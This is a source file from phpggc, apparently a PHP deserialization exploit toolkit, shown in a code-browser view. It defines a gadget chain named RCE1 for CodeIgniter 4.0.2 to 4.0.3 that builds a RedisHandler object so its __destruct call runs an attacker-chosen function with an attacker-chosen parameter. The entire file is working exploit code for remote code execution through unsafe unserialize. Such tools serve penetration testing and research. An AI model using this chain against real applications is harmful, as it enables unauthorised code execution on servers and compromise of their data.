Codebase list phpggc / fc46c40 gadgetchains / CodeIgniter4 / RCE / 1 / chain.php
fc46c40

Tree @fc46c40 (Download .tar.gz)

chain.php @fc46c40raw · history · blame

<?php

namespace GadgetChain\CodeIgniter4;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '4.0.2 <= 4.0.3';
    public static $vector = '__destruct';
    public static $author = 'eboda';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
    }
}